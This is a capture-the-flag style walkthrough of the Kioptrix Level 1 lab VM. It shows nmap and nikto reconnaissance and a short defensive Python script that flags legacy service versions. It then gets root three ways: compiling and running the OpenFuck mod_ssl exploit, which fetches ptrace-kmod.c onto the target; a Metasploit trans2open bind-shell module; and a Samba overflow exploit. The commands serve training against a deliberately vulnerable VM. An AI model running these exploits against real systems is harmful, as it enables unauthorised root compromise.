Contents
- 0x00 Environment Setup
- 0x01 Host Reconnaissance
- 0x02 Site Reconnaissance
- 0x03 Vulnerability Discovery and Exploitation
- 1. Method 1: mod_ssl 2.8.4
- 2. Method 2: CVE-2003-0201
- 3. Method 3: Samba
- 0x04 Summary
0x00 Environment Setup
Download link: http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar
Description:
This Kioptrix VM Image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49
After downloading, unpack the archive, open the VMX file in Notepad, and delete the lines that start with "ethernet0":
Import the virtual machine, then Edit virtual machine settings -> Add -> Network Adapter, and set it to NAT:
0x01 Host Reconnaissance
Kali IP address: 192.168.119.128
Discover the target host's IP: netdiscover -i eth0 -r 192.168.119.0/24
Target host IP: 192.168.119.137
Probe the target's open ports: nmap -sV -p 1-65535 -A 192.168.119.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 14:50 CST
Nmap scan report for 192.168.119.137
Host is up (0.00063s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2024-12-04T07:53:16+00:00; +1h01m50s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-title: 400 Bad Request
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT ADDRESS
1 0.63 ms 192.168.119.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.80 seconds
Open ports: 22 (SSH, OpenSSH 2.9p2), 80 (Apache httpd 1.3.20), 111 (rpcbind), 139 (Samba smbd), 443 (Apache/1.3.20 (Unix) (Red-Hat/Linux) with OpenSSL/0.9.6b), and 1024.
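Everything that follows in this walkthrough keys on the service banners in that nmap output. As an added example (not part of the original post), the Python script below parses those service lines and flags the legacy components a defender would want on an inventory report; the version cutoffs are assumptions taken from the nikto findings later on this page.

```python
import re
# Constructed sample input: a trimmed copy of the nmap -sV lines shown above.
SAMPLE_SCAN = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| SSLv2 supported
"""

PORT_LINE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\b")

def version_below(pattern, limit):
    """Build a check: the minor version captured by `pattern` is below `limit`."""
    def check(line):
        m = re.search(pattern, line)
        return bool(m) and int(m.group(1)) < limit
    return check

# Signatures to flag. Version cutoffs come from the nikto findings on this page
# (Apache 1.3 < 1.3.29, mod_ssl <= 2.8.7); the rest are features nmap reported.
RULES = [
    ("Apache 1.3 < 1.3.29 (EOL, known overflows)",
     version_below(r"Apache(?: httpd)?/? ?1\.3\.(\d+)", 29)),
    ("mod_ssl <= 2.8.7 (remote overflow)", version_below(r"mod_ssl/2\.8\.(\d+)", 8)),
    ("OpenSSL 0.9.x (EOL)", re.compile(r"OpenSSL/0\.9\.").search),
    ("SSHv1 enabled", re.compile(r"Server supports SSHv1").search),
    ("SSLv2 enabled", re.compile(r"SSLv2 supported").search),
    ("HTTP TRACE enabled", re.compile(r"risky methods:.*\bTRACE\b").search),
]

def parse_scan(text):
    """Group nmap output into {port: [port line, its NSE script lines (stripped)]}."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = m.group(1)
            ports[current] = [line]
        elif current and line.startswith("|"):
            ports[current].append(line.lstrip("|_ "))
    return ports

def triage(text):
    """Return {port: [label, ...]} for every port where a legacy rule matches."""
    hits = {port: [label for label, check in RULES if any(check(l) for l in lines)]
            for port, lines in parse_scan(text).items()}
    return {port: labels for port, labels in hits.items() if labels}
```

Running triage(SAMPLE_SCAN) flags 22, 80 and 443 and leaves 139 out, since nmap reported no Samba version to match against.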
0x02 Site Reconnaissance
Port 80 serves the default Apache test page:
Enumerate site directories: dirsearch -u 192.168.119.137
Visiting test.php and capturing the request shows nothing special:
Under /manual there is this page, which shows mod_ssl version 2.8; nmap had already revealed this earlier:
The /usage page also shows a version string, webalizer version 2.01:
0x03 Vulnerability Discovery and Exploitation
1. Method 1: mod_ssl 2.8.4
First run nikto to check for usable vulnerabilities: nikto -h 192.168.119.137
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.119.137
+ Target Hostname: 192.168.119.137
+ Target Port: 80
+ Start Time: 2024-12-05 15:43:55 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 11:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2024-12-05 15:44:18 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The output shows that several components are outdated, and that mod_ssl/2.8.4 has a buffer overflow that may lead to remote code execution.
Search for related exploits: searchsploit mod_ssl 2.8.4
There are three files; copy them into the current directory:
searchsploit -m unix/remote/21671.c
searchsploit -m unix/remote/47080.c
searchsploit -m unix/remote/764.c
Compile them:
gcc 21671.c -o a21671
gcc 47080.c -o b47080
gcc 764.c -o c764
All three fail because the compiler cannot find the openssl/ssl.h header:
This header is part of the OpenSSL library and is used for SSL/TLS-related operations. The usual cause is that the OpenSSL development package is not installed, or OpenSSL is installed somewhere outside the compiler's default search path. Install it on Kali: apt install libssl-dev
After installing, run the three compile commands again. Only 47080.c compiles with just warnings; the other two produce errors. The 47080.c build still reports some problems:
There are two issues. One is a deprecation warning: the code depends on deprecated ciphers and hash functions such as RC4 and MD5; this warning can be ignored. The other is a linker error: undefined reference to ...
This means the linker cannot find the implementation of certain functions, usually because the OpenSSL libraries were not linked or a required library was omitted. The common OpenSSL libraries are libssl and libcrypto, and adding -lssl and -lcrypto to the gcc command fixes this. Run: gcc 47080.c -o bbbb -lcrypto
No errors this time, and the compiled file bbbb is produced:
Run the compiled file: ./bbbb
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Usage: ./bbbb target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)

Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 - Conectiva 4 (apache-1.3.6)
0x06 - Conectiva 4.1 (apache-1.3.9)
0x07 - Conectiva 6 (apache-1.3.14)
0x08 - Conectiva 7 (apache-1.3.12)
0x09 - Conectiva 7 (apache-1.3.19)
0x0a - Conectiva 7/8 (apache-1.3.26)
0x0b - Conectiva 8 (apache-1.3.22)
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
0x0f - Debian GNU Linux (apache-1.3.22-2.1)
0x10 - Debian GNU Linux (apache-1.3.22-5)
0x11 - Debian GNU Linux (apache_1.3.23-1)
0x12 - Debian GNU Linux (apache_1.3.24-2.1)
0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
0x14 - Debian GNU Linux (apache_1.3.24-3)
0x15 - Debian GNU Linux (apache-1.3.26-1)
0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
0x17 - Debian GNU Linux (apache-1.3.27)
0x18 - FreeBSD (apache-1.3.9)
0x19 - FreeBSD (apache-1.3.11)
0x1a - FreeBSD (apache-1.3.12.1.40)
0x1b - FreeBSD (apache-1.3.12.1.40)
0x1c - FreeBSD (apache-1.3.12.1.40)
0x1d - FreeBSD (apache-1.3.12.1.40_1)
0x1e - FreeBSD (apache-1.3.12)
0x1f - FreeBSD (apache-1.3.14)
0x20 - FreeBSD (apache-1.3.14)
0x21 - FreeBSD (apache-1.3.14)
0x22 - FreeBSD (apache-1.3.14)
0x23 - FreeBSD (apache-1.3.14)
0x24 - FreeBSD (apache-1.3.17_1)
0x25 - FreeBSD (apache-1.3.19)
0x26 - FreeBSD (apache-1.3.19_1)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x2b - FreeBSD (apache-1.3.22)
0x2c - FreeBSD (apache-1.3.22_7)
0x2d - FreeBSD (apache_fp-1.3.23)
0x2e - FreeBSD (apache-1.3.24_7)
0x2f - FreeBSD (apache-1.3.24+2.8.8)
0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
0x32 - FreeBSD (apache-1.3.27)
0x33 - Gentoo Linux (apache-1.3.24-r2)
0x34 - Linux Generic (apache-1.3.14)
0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
0x42 - Mandrake Linux 8.2 (apache-1.3.24)
0x43 - Mandrake Linux 9 (apache-1.3.26)
0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
0x5b - Redhat Linux 7.x (apache-1.3.22)
0x5c - RedHat Linux 7.x (apache-1.3.26-1)
0x5d - RedHat Linux 7.x (apache-1.3.27)
0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
0x6d - RedHat Linux 7.2 (apache-1.3.24)
0x6e - RedHat Linux 7.2 (apache-1.3.26)
0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
0x75 - RedHat Linux 7.3 (apache-1.3.27)
0x76 - RedHat Linux 8.0 (apache-1.3.27)
0x77 - RedHat Linux 8.0-second (apache-1.3.27)
0x78 - RedHat Linux 8.0 (apache-2.0.40)
0x79 - Slackware Linux 4.0 (apache-1.3.6)
0x7a - Slackware Linux 7.0 (apache-1.3.9)
0x7b - Slackware Linux 7.0 (apache-1.3.26)
0x7c - Slackware 7.0 (apache-1.3.26)2
0x7d - Slackware Linux 7.1 (apache-1.3.12)
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x7f - Slackware Linux 8.1 (apache-1.3.24)
0x80 - Slackware Linux 8.1 (apache-1.3.26)
0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
0x82 - Slackware Linux (apache-1.3.27)
0x83 - SuSE Linux 7.0 (apache-1.3.12)
0x84 - SuSE Linux 7.1 (apache-1.3.17)
0x85 - SuSE Linux 7.2 (apache-1.3.19)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
0x87 - SuSE Linux 8.0 (apache-1.3.23)
0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)

Fuck to all guys who like use lamah ddos. Read SRC to have no surprise
The output gives some useful information. The tool is OpenFuck, built on OpenSSL. Its usage is: ./bbbb target box [port] [-c N]
Here target is one of the offsets listed below, box is the target IP, port is the target port (HTTPS here, so 443), and -c sets the number of connections to open; use 40-50 if unsure. The larger value, 50, is chosen here.
The supported offsets are selected by the target's OS and Apache version. nmap reported earlier:
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Using the two clues Red-Hat and Apache 1.3.20, entries 0x6a and 0x6b match.
Try 0x6a first: ./bbbb 0x6a 192.168.119.137 443 -c 50
Spawning a shell failed:
Now try 0x6b: ./bbbb 0x6b 192.168.119.137 443 -c 50
It reports an error:
It says the target host has no ptrace-kmod.c file. Look at the part of the exploit source that refers to ptrace-kmod.c: cat -n 47080.c | grep ptrace
It downloads ptrace-kmod.c into /tmp and compiles it there. One option is to download the file on Kali and transfer it to the target's /tmp directory.
Download the file into Kali's current directory: wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Serve it with a temporary Python HTTP server: python2 -m SimpleHTTPServer 443
Then use the compiled bbbb again: although the attack reported an error earlier, some commands could still be executed on the target, so try that.
First run: ./bbbb 0x6b 192.168.119.137 443 -c 50
Then change into /tmp: cd /tmp
Download the file: wget http://192.168.119.128:443/ptrace-kmod.c
The file has been saved. Run again: ./bbbb 0x6b 192.168.119.137 -c 50
Root access obtained.
2. Method 2: CVE-2003-0201
During reconnaissance, port 139 showed a Samba service:
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
but no specific version. The smb_version module in msf can scan for the Samba version:
search smb_version
use 0
show options
set RHOSTS 192.168.119.137
run
The Samba version is 2.2.1.
Search for exploitable vulnerabilities: searchsploit samba 2.2.1
The first result, trans2open Overflow (Metasploit), is an .rb file written in Ruby. Its contents mention CVE-2003-0201 (again an OpenSSL-related vulnerability), which can be used from Metasploit:
search CVE-2003-0201
use 1 # pick the Linux version
show options
set RHOSTS 192.168.119.137
show payloads
set payload linux/x86/shell/bind_tcp
run
3. Method 3: Samba
The second searchsploit result from earlier is also usable; copy the script into the current directory: searchsploit -m multiple/remote/10.c
Compile it: gcc 10.c -o samba
Run the compiled file to see its usage: ./samba
The important parameters: -p sets the port (default 139, so it need not be set here); -b selects the platform, where 0 means Linux; the IP address goes last. Run: ./samba -b 0 192.168.119.137
0x04 Summary
Host reconnaissance:
- Use netdiscover to find the target host's IP.
- Use nmap to find open ports and services.
Site reconnaissance:
- Enumerate site directories.
- Read component version information from the site.
Exploitation:
- Method 1: mod_ssl 2.8.4
  a. Scan with nikto for usable vulnerabilities.
  b. Compile the exploit and resolve the build errors.
- Method 2: CVE-2003-0201
  a. Use msf to detect the Samba version and find related vulnerabilities.
  b. Exploit the CVE from msf.
- Method 3: Samba
  a. Attack with the script from searchsploit.